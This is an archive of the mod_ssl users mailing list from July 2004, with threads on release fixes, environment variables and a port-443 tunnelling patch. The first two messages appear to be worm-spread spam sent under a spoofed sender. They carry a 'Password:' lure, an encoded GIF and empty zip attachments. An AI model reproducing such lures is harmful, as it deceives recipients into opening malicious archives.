Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 226ABA8A91; Wed, 21 Jul 2004 11:36:01 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dom-13s0l6xmbq1.net (zwierzyniec.tygrys.com.pl [80.53.183.130])
	by master.modssl.org (Postfix) with SMTP id E350CA8982
	for ; Wed, 21 Jul 2004 11:35:53 +0200 (CEST)
Date: Wed, 21 Jul 2004 11:35:49 +0100
To: "Modssl-users" 
From: "Rse" 
Subject: Re:
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------igxszecmkmkbrpsvpult"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------igxszecmkmkbrpsvpult
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


>Predators





Password: 





----------igxszecmkmkbrpsvpult
Content-Type: image/gif; name="sabdlzbomf.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="sabdlzbomf.gif"
Content-ID: 

R0lGODlhPAASAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAA8ABIAAAjtAP8JHEiwoMGD
CBMqXMiwocOHECNKnEixokWB74gJzOeLGLGO//xN63hvoDRfvqgVXObrokF8IEMSi0cwni9/
HO39Y0Ysnz9fJQVS++iyIDyi/+4R80cwpseCTwUe1VhUIL5pUW2qIzZN4EicQAlyfCeUGsqq
Uv+d/WdPIz5iQeN5pDoQ3k2p/qIW9UdT70BfzJISw/c26L9mxOBt7Iq06LRqaukOJLpVINK8
xQZOUxmz6EePayeTRRrTlzqCxNB1bFw1prSlb7tiJQz331ttBzujjZlPLjPDb2v/W/ZRnF/W
aJMrX868ufPnBwMCADvRdv9/QGVAZf9//3//f/9//3//f0BlCW7/fzZ3QGWbe3p7QGU2d/9/
/3//f9F2QGXRdv9//3+be9F2/39AZUBl/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//39Ncrx/QGVAZf9//3/RdkBl3X94e0BlFHf/f/9/
TXJAZUBlQGXef/9//3//f/9/TXJAZXh7/3//f01yvH9AZUBl/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//396exR3QGVAZf9//3/RdkBl
CW5AZdF2/3//f/N2QGW8f7x/QGUUd/9//3//f/9/vH9AZQlu/3//f3p7FHdAZUBl/3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f01y
QGVAZf9//39Xe0Blenv/f/9//3//f0BlQGX/f/9/QGVAZf9//3//f/9//39AZUBl/3//f/9/
TXJAZUBl/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f3h7QGVAZf9//3+be0Bl83b/f/9//3//f9F2QGW8f7x/QGXRdv9/TXJAZd1/
3X9AZRR3/3//f/9/eHtAZUBl/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9/CW5AZf9//3/ef0BlQGVAZUBlQGX/f91/83ZAZUBl
83bef/9/3X+PckBlQGUUd/9//3//f/9//38JbkBl/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/


----------igxszecmkmkbrpsvpult
Content-Type: application/octet-stream; name="Cat.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Cat.zip"



----------igxszecmkmkbrpsvpult--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 21 14:14:45 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3E1CBA8978; Wed, 21 Jul 2004 14:14:45 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bogdan.net (normandia.ro [213.157.171.88])
	by master.modssl.org (Postfix) with SMTP id 8A655A8943
	for ; Wed, 21 Jul 2004 14:14:39 +0200 (CEST)
Date: Wed, 21 Jul 2004 15:14:38 +0200
To: "Modssl-users" 
From: "Rse" 
Subject: Re:
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------nszyoiwqttduoueexgzj"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------nszyoiwqttduoueexgzj
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


fotoinfo





Password: 





----------nszyoiwqttduoueexgzj
Content-Type: image/gif; name="spdlrdzkpj.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="spdlrdzkpj.gif"
Content-ID: 

R0lGODlhOwATAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAA7ABMAAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixIkVixHwRE4iPmS97BKcRa5ZvIDxi8Er6Epcxo0WC+Xw1G6jNF75/
4u4JvOcrHzFmAuMR8+cLKEFmOl/uJBZvYLON/4oKxPjPJUGrAqn5UjpQJLWBvrZGhWrPlz9i
NwfiIzZtYMykXJv5MvauJFWiUM+iJQjPlzR/A6kR28Z1IGCpPP+thfdPG1qUBe/tFeixcEGq
+Zot46mzMlawxgQSbVv4pEBfjAPv1Rh1WcG1rv/JI1bNstB8kgU+/Qdv5r+ya5PaG4rPpsBp
Zi3/LlpbcTpicP8xg04wnrjNA6kq365cY0vvLL2jEwvbkmVGjd7JoxfHvb379/C3BwQAOwAA==

----------nszyoiwqttduoueexgzj
Content-Type: application/octet-stream; name="Secret.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Secret.zip"



----------nszyoiwqttduoueexgzj--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 21 14:43:09 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D33B0A8959; Wed, 21 Jul 2004 14:43:09 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id 3DED7A8943
	for ; Wed, 21 Jul 2004 14:42:53 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.12.10/8.12.10) with ESMTP id i6LCgne1002003
	for ; Wed, 21 Jul 2004 08:42:49 -0400
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by int-mx1.corp.redhat.com (8.11.6/8.11.6) with ESMTP id i6LCgma30183
	for ; Wed, 21 Jul 2004 08:42:49 -0400
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.12.10/8.12.7) with ESMTP id i6LCgl7m024541
	for ; Wed, 21 Jul 2004 13:42:47 +0100
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.12.10/8.12.10/Submit) id i6LCglXP024540
	for modssl-users@modssl.org; Wed, 21 Jul 2004 13:42:47 +0100
Date: Wed, 21 Jul 2004 13:42:47 +0100
From: Joe Orton 
To: modssl-users@modssl.org
Subject: Re: [ANNOUNCE] mod_ssl 2.8.19 for Apache 1.3.31
Message-ID: <20040721124247.GA24531@redhat.com>
Mail-Followup-To: modssl-users@modssl.org
References: <20040716204207.GA45678@engelschall.com> <20040716211102.GA6223@redhat.com> <20040717065709.GA29039@engelschall.com> <20040720161913.GB21064@suse.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
In-Reply-To: <20040720161913.GB21064@suse.de>
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, Jul 20, 2004 at 06:19:13PM +0200, Juergen Weigert wrote:
> On Jul 17, 04 08:57:09 +0200, Ralf S. Engelschall wrote:
> > On Fri, Jul 16, 2004, Joe Orton wrote:
> > > [...] I think it's portable to  assume time_t is a long...
> > > [...]
> 
> I'd appreciate  
>         assert(sizof(time_t) == sizeof(long));
> near that. 

Casting the value to a long would be better than a runtime assertion if
you're worried about it, there's only one place it happens.

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 23 09:12:57 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 55804A8974; Fri, 23 Jul 2004 09:12:57 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mailserver.kippdata.de (hoech.kippdata.de [195.227.118.3])
	by master.modssl.org (Postfix) with ESMTP id CC340A8A59
	for ; Fri, 23 Jul 2004 09:12:40 +0200 (CEST)
Received: from kippdata.de (sorbus.kippdata.de [195.227.30.156])
	by mailserver.kippdata.de (8.12.10/8.12.10) with ESMTP id i6N7Ceoh016449
	for ; Fri, 23 Jul 2004 09:12:41 +0200 (MEST)
Message-ID: <4100BA60.6010003@kippdata.de>
Date: Fri, 23 Jul 2004 09:12:32 +0200
From: Bernd Steinert 
User-Agent: Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.4) Gecko/20040414
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Remarks to [ANNOUNCE] mod_ssl 2.8.19
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bernd Steinert 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Ralf S. Engelschall wrote:

 > Yes, although they are not security related, they could crash the
 > server, too. So we should fix those formatting bugs, too. A little bit
 > of extra casting might be required, I think. I've now committed to my
 > CVS for mod_ssl 2.8.20 the following patch. Thanks for your feedback.


Might mod_ssl 2.8.20 be released in the near future, e.g within a week?

Regards

    Bernd Steinert

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jul 25 14:03:12 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 308B6A8A91; Sun, 25 Jul 2004 14:03:12 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from master.openssl.org (master.openssl.org [195.27.176.155])
	by master.modssl.org (Postfix) with ESMTP id 3BE68A8A8F
	for ; Sun, 25 Jul 2004 14:03:11 +0200 (CEST)
Received: by master.openssl.org (Postfix, from userid 1000)
	id 1C2B8203630; Sun, 25 Jul 2004 14:03:11 +0200 (CEST)
Date: Sun, 25 Jul 2004 14:03:10 +0200
From: "Ralf S. Engelschall" 
To: modssl-users@modssl.org
Subject: Re: Remarks to [ANNOUNCE] mod_ssl 2.8.19
Message-ID: <20040725120310.GA77721@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4.2.1i
Organization: Engelschall, Germany.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


In article <4100BA60.6010003@kippdata.de> you wrote:
> Ralf S. Engelschall wrote:
> 
> > Yes, although they are not security related, they could crash the
> > server, too. So we should fix those formatting bugs, too. A little bit
> > of extra casting might be required, I think. I've now committed to my
> > CVS for mod_ssl 2.8.20 the following patch. Thanks for your feedback.
> 
> Might mod_ssl 2.8.20 be released in the near future, e.g within a week?

No, I'll certainly accumulate more fixes before a release, I think.

                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jul 25 14:06:55 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2FADFA8A8F; Sun, 25 Jul 2004 14:06:55 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mhub.AXP.MDX.AC.UK (mhub.axp.mdx.ac.uk [158.94.254.14])
	by master.modssl.org (Postfix) with ESMTP id 1A177A8A89
	for ; Sun, 25 Jul 2004 14:06:39 +0200 (CEST)
Date: Sun, 25 Jul 2004 13:03:35 +0000
From: a.moon@mdx.ac.uk
Subject: Re: Remarks to [ANNOUNCE] mod_ssl 2.8.19
To: modssl-users@modssl.org
Message-id: <4B08E55EA4@mdx-cpq-temp1.nw.mdx.ac.uk>
MIME-version: 1.0
Content-type: TEXT/PLAIN
Content-transfer-encoding: 7BIT
X-INTERNAL-IP: 10.13.75.36
X-Autoreply-From: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Sorry I am away on annual leave.  
Please contact OLSU if urgent, otherwise i will get back 
to you as soon as possible on my return on the 2nd August 2004.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 26 12:19:23 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 80DD0A8976; Mon, 26 Jul 2004 12:19:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from alpha2.AXP.MDX.AC.UK (alpha2.axp.mdx.ac.uk [158.94.0.14])
	by master.modssl.org (Postfix) with ESMTP id F0ABFA895E
	for ; Mon, 26 Jul 2004 12:19:06 +0200 (CEST)
Date: Mon, 26 Jul 2004 10:32:57 +0000
From: a.moon@mdx.ac.uk
Subject: Re: Remarks to [ANNOUNCE] mod_ssl 2.8.19
To: modssl-users@modssl.org
Message-id: <8ADB2010299@mdx-bg-staff2.nw.mdx.ac.uk>
MIME-version: 1.0
Content-type: TEXT/PLAIN
Content-transfer-encoding: 7BIT
X-INTERNAL-IP: 10.13.75.34
X-Autoreply-From: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Sorry I am away on annual leave.  
Please contact OLSU if urgent, otherwise i will get back 
to you as soon as possible on my return on the 2nd August 2004.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 26 17:50:09 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A05D1A8D15; Mon, 26 Jul 2004 17:50:09 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web50006.mail.yahoo.com (web50006.mail.yahoo.com [206.190.38.21])
	by master.modssl.org (Postfix) with SMTP id BE0C0A8A99
	for ; Mon, 26 Jul 2004 17:49:52 +0200 (CEST)
Message-ID: <20040726154949.4034.qmail@web50006.mail.yahoo.com>
Received: from [198.81.129.193] by web50006.mail.yahoo.com via HTTP; Mon, 26 Jul 2004 08:49:49 PDT
Date: Mon, 26 Jul 2004 08:49:49 -0700 (PDT)
From: richard dinh 
Subject: is it possible to modify the mod_ssl env table ?
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: richard dinh 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,
This is a general question about mod_ssl.

Once the environment of the mod_ssl gets populated, is
it possible to change the env variables through
another module? For example, the certificate
information gets passed as SSL_CLIENT_S_DN, and I need
to rewrite that string value with something else, for
example without slashes. The program I am using does
not like slashes in the certificate CN and DN that are
being passed, so I thought I might write something in
Perl to modify this information after the tables get
populated. Is this possible? If not, then why?

Thanks
Richard


	
		
__________________________________
Do you Yahoo!?
New and Improved Yahoo! Mail - 100MB free storage!
http://promotions.yahoo.com/new_mail 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 26 18:23:15 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 765B5A89B8; Mon, 26 Jul 2004 18:23:15 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from tb-solutions.com (zaz-pub-mx02.tb-solutions.com [195.55.45.1])
	by master.modssl.org (Postfix) with ESMTP id BCD34A8978
	for ; Mon, 26 Jul 2004 18:22:58 +0200 (CEST)
Date: Mon, 26 Jul 2004 18:22:55 +0200
Message-Id: <200407261822.AA277610728@tb-solutions.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
From: "Pablo Royo Moreno" 
To: 
Subject: A method to enable secure non-HTTP protocols
X-Mailer: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Pablo Royo Moreno" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



For some years, we have been in my company running a secure non-http file t=
ransfer system. Nowadays, with more and more system administrators allowing=
 secure incoming connections only trough  443 port , that system doesn=B4t =
work, because it does not speak HTTP and 443 port is usually already used b=
y web servers, so we cant use it for our systems. 
So there is no solution, if system admin does not open another port, except=
 to use 443 port.

Now we have made a mod_ssl patch to allow non-HTTP secure incoming connecti=
ons to be deciphered and forwarded to a selected server, configured in conf=
 file, while also serving HTTP in the usual way. I=B4m not sure if this can=
 be done in any other way with Apache modules, but it works and its all i n=
eed.

The patch is in 

http://spipe.sourceforge.net 

If you see documentation, you will see there are some other  interesting (I=
 think) use cases to create secure "pipes" from one web server to another.

Hope it will be of help to someone in the same situation. If not, just cons=
ider it a more or less summer academic experiment.

Thank you

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 26 21:36:08 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 89ED8A8995; Mon, 26 Jul 2004 21:36:08 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from enroque.rawbyte.com (adsl-63-192-218-231.dsl.snfc21.pacbell.net [63.192.218.231])
	by master.modssl.org (Postfix) with ESMTP id 9F588A895E
	for ; Mon, 26 Jul 2004 21:35:49 +0200 (CEST)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id D9BCF4752F; Mon, 26 Jul 2004 09:18:08 -0700 (PDT)
Date: Mon, 26 Jul 2004 09:18:08 -0700
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: A method to enable secure non-HTTP protocols
Message-ID: <20040726161808.GA23525@rawbyte.com>
References: <200407261822.AA277610728@tb-solutions.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
In-Reply-To: <200407261822.AA277610728@tb-solutions.com>
User-Agent: Mutt/1.4i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Nice :)

Apache 2 protocol modules should allow you to do this without having to
patch the server (using filters), as in Apache 2 HTTP is just another
protocol module that can be inserted or removed.
In Apache 2 mod_ssl itself is implemented as a filter

On Mon, Jul 26, 2004 at 06:22:55PM +0200, Pablo Royo Moreno wrote:
> 
> 
> For some years, we have been in my company running a secure non-http file transfer system. Nowadays, with more and more system administrators allowing secure incoming connections only trough  443 port , that system doesn´t work, because it does not speak HTTP and 443 port is usually already used by web servers, so we cant use it for our systems.
> So there is no solution, if system admin does not open another port, except to use 443 port.
> 
> Now we have made a mod_ssl patch to allow non-HTTP secure incoming connections to be deciphered and forwarded to a selected server, configured in conf file, while also serving HTTP in the usual way. I´m not sure if this can be done in any other way with Apache modules, but it works and its all i need.
> 
> The patch is in
> 
> http://spipe.sourceforge.net
> 
> If you see documentation, you will see there are some other  interesting (I think) use cases to create secure "pipes" from one web server to another.
> 
> Hope it will be of help to someone in the same situation. If not, just consider it a more or less summer academic experiment.
> 
> Thank you
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 30 00:32:53 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 572DFA8978; Fri, 30 Jul 2004 00:32:53 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web60003.mail.yahoo.com (web60003.mail.yahoo.com [216.109.116.226])
	by master.modssl.org (Postfix) with SMTP id 5F38BA8974
	for ; Fri, 30 Jul 2004 00:32:36 +0200 (CEST)
Message-ID: <20040729223232.18016.qmail@web60003.mail.yahoo.com>
Received: from [66.35.239.94] by web60003.mail.yahoo.com via HTTP; Thu, 29 Jul 2004 15:32:32 PDT
Date: Thu, 29 Jul 2004 15:32:32 -0700 (PDT)
From: Derek 
Subject: The caveats of ./configure --force
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Derek 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I searched the archive and the FAQ, so hopefully I
didn't miss this...

Because of the latest advisory, I am upgrading to
2.8.19-1.3.31.  But due to internal change management
procedures, I am stuck with Apache 1.3.27 for at least
the next few weeks while management makes the decision
to move to 1.3.31.

I was able to get 1.3.27 to compile with mod_ssl
2.8.19-1.3.31 and OpenSSL 0.9.7d using ./configure
--force.

Are there any caveats I should be aware of before
diving too deep?

Thanks in advance,

Derek
dereks007@yahoo.com


		
__________________________________
Do you Yahoo!?
Yahoo! Mail is new and improved - Check it out!
http://promotions.yahoo.com/new_mail
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 30 00:36:08 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 87758A8A79; Fri, 30 Jul 2004 00:36:08 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
